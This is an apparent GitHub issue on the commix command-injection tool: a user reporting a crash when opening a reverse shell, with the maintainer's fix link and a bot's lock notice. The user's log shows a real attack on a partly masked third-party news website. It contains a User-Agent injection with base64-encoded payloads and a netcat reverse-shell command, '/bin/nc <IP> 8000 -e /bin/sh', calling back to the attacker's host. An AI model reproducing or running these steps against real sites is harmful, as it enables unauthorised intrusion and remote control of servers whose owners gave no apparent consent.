recurent error with reverse_tcp

[lacroutelacroute]

hello admin

use up to date version It may be only me who does not know how to use but I can not make it work reverse_tcp iam sure unix version i have scanned apache trame it is ubuntu version

iam whitehat hacker research to bugbounty i have discovered injection point but not prove i have scanned closed port to server with nmap option -d2

I have never managed to run reverse_tcp on a remote server

:~$ sudo commix -v 1 -u "http://il*******.it/ANSAviewnews2.php" --random-agent --technique=f --level=3 --tamper=base64encode --batch commix.py
__ /_\
/`\ / `\ /' __\ /' ` `\/\ \ /\ \/'\ v1.8-dev#15 /\ _//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \/> </
\ __\ __/\ _\ _\ _\ _\ _\ _\ _\/_/\\ http://commixproject.com \/_/\// \//\//\//\//\//\//\//\//\// (@commixproject)

+-- Automated All-in-One OS Command Injection and Exploitation Tool Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst) +--

[] Checking connection to the target URL... [ SUCCEED ] [] Identifying the target server... [ SUCCEED ] [+] The target server was identified as nginx/1.8.0. [] Identifying the target application ... [ SUCCEED ] [+] The target application was identified as PHP. [] Loading tamper script(s): [~] base64encode [!] Warning: Heuristics have failed to identify server's operating system. [?] Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > U [] Identifing the indicated web-page charset... [ SUCCEED ] [+] The indicated web-page charset appears to be utf-8. [] Estimating the target URL response time... [ SUCCEED ] [+] A previously stored session has been held against that host. [*] Testing the (semi-blind) tempfile-based injection technique... [+] The HTTP header User-Agent seems injectable via (semi-blind) tempfile-based injection technique. [~] Payload: O3N0cj0kKGVjaG8gSlNXUUZQPi90bXAvSlNXUUZQLnR4dCk7c3RyPSQoY2F0IC90bXAvSlNXUUZQLnR4dCk7c3RyMT0keyNzdHJ9O2lmIFsgNiAtbmUgJHtzdHIxfSBdO3RoZW4gc2xlZXAgMDtlbHNlIHNsZWVwIDE7Zmkg

[*] Executing the 'rm /tmp/JSWQFP.txt ' command... |_ O3JtIC90bXAvSlNXUUZQLnR4dCAjPi90bXAvSlNXUUZQLnR4dA==

Pseudo-Terminal (type '?' for available options) commix(os_shell) > reverse_tcp commix(reverse_tcp) > set LPORT 8000 LPORT => 8000 commix(reverse_tcp) > set LHOST 82.246.225. LHOST => 82.246.225.

---[ Reverse TCP shells ]---
Type '1' to use a netcat reverse TCP shell. Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 1

---[ Unix-like targets ]--- Type '1' to use the default Netcat on target host. Type '2' to use Netcat for Busybox on target host. Type '3' to use Netcat-Traditional on target host.

commix(reverse_tcp_netcat) > 1 [+] Everything is in place, cross your fingers and wait for a shell!

[*] Executing the '/bin/nc 82.246.225.** 8000 -e /bin/sh' command... |_ O2VjaG8gSlNXUUZQJChlY2hvIEpTV1FGUCkkKGVjaG8gJCgvYmluL25jIDgyLjI0Ni4yMjUuMzMgODAwMCAtZSAvYmluL3NoKSkkKGVjaG8gSlNXUUZQKUpTV1FGUA==Traceback (most recent call last): File "./commix.py", line 979, in main(filename, url, init_test) File "./commix.py", line 793, in main controller.do_check(url, filename) File "/pentest/exploitation/commix/src/core/injections/controller/controller.py", line 483, in do_check if perform_checks(url,filename) == False: File "/pentest/exploitation/commix/src/core/injections/controller/controller.py", line 447, in perform_checks stored_http_header_injection(url, check_parameter, http_request_method, filename, timesec) File "/pentest/exploitation/commix/src/core/injections/controller/controller.py", line 234, in stored_http_header_injection injection_proccess(url, check_parameter, http_request_method, filename, timesec) File "/pentest/exploitation/commix/src/core/injections/controller/controller.py", line 179, in injection_proccess if fb_handler.exploitation(url, timesec, filename, http_request_method, url_time_response) != False: File "/pentest/exploitation/commix/src/core/injections/semiblind/techniques/file_based/fb_handler.py", line 689, in exploitation if fb_injection_handler(url, timesec, filename, http_request_method, url_time_response) == False: File "/pentest/exploitation/commix/src/core/injections/semiblind/techniques/file_based/fb_handler.py", line 231, in fb_injection_handler tfb_handler.exploitation(url, timesec, filename, tmp_path, http_request_method, url_time_response) File "/pentest/exploitation/commix/src/core/injections/semiblind/techniques/tempfile_based/tfb_handler.py", line 633, in exploitation if tfb_injection_handler(url, timesec, filename, tmp_path, http_request_method, url_time_response) == False: File "/pentest/exploitation/commix/src/core/injections/semiblind/techniques/tempfile_based/tfb_handler.py", line 558, in tfb_injection_handler go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again) File "/pentest/exploitation/commix/src/core/injections/controller/shell_options.py", line 173, in check_option go_back, go_back_again = reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) File "/pentest/exploitation/commix/src/core/injections/controller/shell_options.py", line 146, in reverse_tcp_config execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option) File "/pentest/exploitation/commix/src/core/injections/controller/shell_options.py", line 69, in execute_shell shell = cb_injector.injection_results(response, TAG, cmd) File "/pentest/exploitation/commix/src/core/injections/results_based/techniques/classic/cb_injector.py", line 265, in injection_results html_data = response.read() AttributeError: 'int' object has no attribute 'read' :~$

[stasinopoulos]

Thanks for the bug report, i ll check it out soon.

[stasinopoulos]

Fixed at https://github.com/commixproject/commix/commit/d51e90b85344bd5c855a5c911681fa7ac8d3fa75

[github-actions[bot]]

This issue has been automatically locked since there has not been any recent activity after it was closed. Please open a new issue for related issues.